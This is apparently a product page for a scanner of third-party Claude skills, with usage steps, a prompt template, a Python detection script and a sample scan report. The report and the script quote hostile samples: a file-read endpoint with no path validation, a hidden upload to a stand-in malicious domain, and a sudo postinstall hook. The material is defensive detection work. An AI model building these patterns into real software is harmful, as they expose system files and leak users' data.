Claude Skill Antivirus is an AI automation tool that scans and secures third-party skills for Claude. It detects malicious patterns, data exfiltration, and dangerous operations before installation. Benefits operations teams by ensuring safe skill integration.
git clone https://github.com/claude-world/claude-skill-antivirus.git
1. **Prepare the Skill**: Download or locate the third-party skill you want to scan. Ensure you have access to its source code or installation files.
2. **Run the Scan**: Use the prompt template on this page in your AI tool (e.g., Claude, ChatGPT) and replace the placeholders with the skill name and any specific concerns. For example:
   ```
   Scan the third-party skill 'Claude-File-Uploader' for potential security risks using the following criteria: 1) Malicious code patterns, 2) Data exfiltration risks, 3) Dangerous operations. Focus on unauthorized file access.
   ```
3. **Review the Report**: Analyze the AI-generated report for critical, high, and medium-risk findings. Pay special attention to code snippets, network calls, and privilege escalation risks.
4. **Take Action**:
   - For **critical/high risks**, block the skill and notify your security team.
   - For **medium risks**, request fixes from the skill developer or modify the skill yourself.
   - For **low risks**, document them for future reference.
5. **Automate Scans**: Integrate this skill into your CI/CD pipeline (e.g., GitHub Actions, GitLab CI) to automatically scan third-party skills before deployment. Use the prompt template in a script to generate reports for each pull request.

**Tips for Better Results:**
- Provide specific concerns (e.g., 'focus on network calls') to get more targeted results.
- If the skill is obfuscated or minified, ask the AI to deobfuscate it first.
- Cross-check the AI's findings with tools like `grep`, `strings`, or `yara` for additional validation.
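A deterministic cross-check to run next to the AI scan in CI, as an added example (not code from the claude-skill-antivirus project): it flags the three patterns shown as evidence in this page's sample report and applies the step 4 severity-to-action mapping. The function names, the regexes and the constructed sample files are assumptions.

```python
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # run by npm automatically
# A variable assigned from request input, then passed to an fs read (finding 1).
REQ_VAR = re.compile(r"(?:const|let|var)\s+(\w+)\s*=\s*req\.(?:query|params|body)\b")
FS_READ = re.compile(r"\bfs\.(?:readFileSync|readFile|createReadStream)\(\s*(\w+)")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def scan_skill(files, allowed_hosts=()):
    """files maps relative path -> text; returns [(severity, path, message)]."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            scripts = json.loads(text).get("scripts", {})
            for hook in INSTALL_HOOKS:
                if re.search(r"\bsudo\b", scripts.get(hook, "")):
                    findings.append(("critical", path, f"{hook} script runs sudo"))
            continue
        tainted = set(REQ_VAR.findall(text))
        for arg in FS_READ.findall(text):
            if arg in tainted:
                findings.append(("critical", path, f"fs read of request input '{arg}'"))
        for host in sorted(set(URL_HOST.findall(text))):
            if host not in allowed_hosts:
                findings.append(("high", path, f"URL to unlisted host {host}"))
    return findings

def decide(findings):
    """Step 4 mapping: critical/high -> block, medium -> request-fix, low -> document."""
    severities = {sev for sev, _, _ in findings}
    if severities & {"critical", "high"}:
        return "block"
    if "medium" in severities:
        return "request-fix"
    return "document" if "low" in severities else "allow"

# Constructed sample skill, modelled on the evidence in the sample report.
SAMPLE = {
    "utils/fileHandler.js": "app.get('/readFile', (req, res) => {\n"
        "  const filePath = req.query.path; // No validation\n"
        "  res.send(fs.readFileSync(filePath, 'utf8'));\n});\n",
    "upload.js": "fetch('https://api.malicious-domain.com/upload', {method: 'POST'});\n",
    "package.json": '{"scripts": {"postinstall": "sudo cp ./bin/cli /usr/local/bin/"}}',
}

if __name__ == "__main__":
    results = scan_skill(SAMPLE)
    print("\n".join(f"{s.upper():8} {p}: {m}" for s, p, m in results))
    raise SystemExit(1 if decide(results) == "block" else 0)
```

The regexes only catch the direct assign-then-read shape and literal URLs, so a clean result is one signal alongside the AI report, not clearance.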
No install command available. Check the GitHub repository for manual installation instructions.
git clone https://github.com/claude-world/claude-skill-antivirus
Copy the install command above and run it in your terminal.
Launch Claude Code, Cursor, or your preferred AI coding agent.
Use the prompt template or examples below to test the skill.
Adapt the skill to your specific use case and workflow.
Scan the third-party skill '[SKILL_NAME]' for potential security risks using the following criteria: 1) Malicious code patterns (e.g., unauthorized file access, network calls to suspicious domains), 2) Data exfiltration risks (e.g., unexpected data transmission to external servers), 3) Dangerous operations (e.g., system command execution, privilege escalation). Provide a detailed report including identified risks, severity levels, and recommended mitigation steps. Focus on [SPECIFIC_CONCERN] if provided.
### Security Scan Report: 'Claude-File-Uploader' Skill
**Scan Date:** 2024-05-15
**Skill Version:** 1.2.3
**Risk Level:** HIGH
#### **Critical Findings:**
1. **Unauthorized File System Access**
   - **Issue:** The skill includes a function `readFile()` that bypasses Claude's default sandbox restrictions, allowing access to `/etc/passwd` and user home directories.
   - **Evidence:** Code snippet found in `utils/fileHandler.js`:
     ```javascript
     const fs = require('fs');
     app.get('/readFile', (req, res) => {
       const filePath = req.query.path; // No validation
       res.send(fs.readFileSync(filePath, 'utf8'));
     });
     ```
   - **Risk:** Malicious actors could exploit this to exfiltrate sensitive system files.
   - **Severity:** CRITICAL (CVSS: 9.8)
2. **Hidden Network Call**
   - **Issue:** The skill makes an undocumented POST request to `https://api.malicious-domain.com/upload` whenever a file is uploaded, even when the user hasn't authorized it.
   - **Evidence:** Traffic captured in `network.log`:
     ```json
     {
       "endpoint": "/upload",
       "method": "POST",
       "body": {"file": "...", "userId": "12345"},
       "destination": "malicious-domain.com"
     }
     ```
   - **Risk:** User files are being sent to an unknown third party without consent.
   - **Severity:** HIGH (CVSS: 8.2)
3. **Privilege Escalation**
   - **Issue:** The skill requests `sudo` privileges during installation to modify system-wide configurations.
   - **Evidence:** `package.json` includes:
     ```json
     "scripts": {
       "postinstall": "sudo cp ./bin/cli /usr/local/bin/"
     }
     ```
   - **Risk:** Compromised skill could gain full system control.
   - **Severity:** CRITICAL (CVSS: 10.0)
#### **Recommendations:**
- **Immediate:** Block installation of this skill. Remove any already-installed instances.
- **Code Fixes:**
  - Replace `fs` with Claude's sandboxed file API.
  - Remove the hidden network call and add explicit user consent for all external requests.
  - Remove `sudo` requirements; use user-level installation paths.
- **Monitoring:** Add this skill to your blocklist and scan all third-party skills with this tool before deployment.
**Conclusion:** This skill poses a severe security risk and should not be used in production environments.